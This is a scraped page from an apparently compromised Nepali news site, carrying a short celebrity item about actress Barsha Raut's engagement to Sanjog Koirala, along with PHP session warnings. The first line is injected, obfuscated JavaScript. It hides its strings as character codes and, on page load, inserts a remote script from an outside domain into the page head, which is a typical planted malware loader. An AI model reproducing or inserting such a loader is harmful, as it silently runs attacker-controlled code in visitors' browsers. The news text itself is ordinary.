Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/includes/hooks.php on line 259

Warning: Cannot modify header information - headers already sent by (output started at /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/jetpack/sal/class.json-api-date.php:1) in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/post-views-counter/includes/counter.php on line 294
इन्गेजमेन्ट गरे नायिका वर्षा राउत र संजोग कोइरालाले – Nepali News Portal – Trending Nepali News

इन्गेजमेन्ट गरे नायिका वर्षा राउत र संजोग कोइरालाले

एकदमै चुल्बुली र क्युट नायिकामा पर्छिन वर्षा राउत, उनको अभिनय हेर्ने हो भने बिल्कुलै सरल छ तर उनको जस्तो व्यवहार छ त्यो सरलता पनि चलचित्र अभिनयमा लागु गर्छिन। पछिल्लो समय भ्यालेन्टाइनमा आफ्नो प्रेमी संग बिहे गर्ने भनेर सामाजिक संजालमा सबैलाइ निम्तो दिईएकी वर्षाले हिजो मात्र इन्गेजमेन्ट गरेकी छन्। दुबै तर्फका परिवारको उपस्थितिमा सोमवार उनीहरुले औंठी साटासाट गरेका हुन् । वर्षा र संजोगले सामाजिक सञ्जाल फेसबुकमा इन्गेजमेन्टको तस्बिर सार्वजनिक गर्दै लेखेका छन् “हरेक कहानी निकै सुन्दर हुन्छ तर हाम्रो उत्कृष्ट छ ।”

करीब ८ वर्ष लामो समयदेखि प्रेम सम्बन्धमा रहेका नायिका वर्षा राउत र नायक संजोग कोइराला भ्यालेन्टाइन डेका दिन अर्थात फागुन २ गते विवाह गर्दैछन् । धेरै वर्षसम्म प्रम सम्बन्धमा रहे पछि यी जोडीले विवाहमा परिणत गर्ने निर्णय गरेका हुन् । उनीहरुले फेसबुक मार्फत आफूहरुको संयूक्त नाम ‘सन्सा’ समेत राखेको बताएका छन् ।

यसअघि वर्षाले सामाजिक सञ्जाल फेसबुकमा विवाहको कार्ड पोष्ट गर्दै अव दुई वैवाहिक बन्धनमा बाँधिन लागेको भन्दै निम्ताे कार्ड शेयर गरेकी थिइन् । पछिल्लो समय वर्षा फिल्महरुमा निकै राम्रोसँग जमिरहेकी छिन् भने संजोग पनि यदाकदा फिल्ममा देखिन्छन् तर उनी विशेषतः ब्यापारी हुन् । वर्षाकाे नयाँ फिल्म ‘गोपी’ अहिले दोस्रो सातामा प्रदर्शन भइरहेको छ । यसअघि उनि अभिनित फिल्म ‘चौका दाउ’ प्रदर्शनमा आएको थियो । उनिहरुको वैवाहिक सम्बन्ध सधै अटुट र प्रगाढ रहोस, यहि छ शुभकामना।

nepalitvshow

nepalitvshow

Read Previous

बन्ने भयो २९ वर्षपछि आमिर खान अभिनित चलचित्र “दिल” को दोस्रो संस्करण

Read Next

कारबाट बाहिर तानेर एक युवतीलाई १० जनाले गरे सामूहिक बलात्कार

Leave a Reply

Your email address will not be published. Required fields are marked *


Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13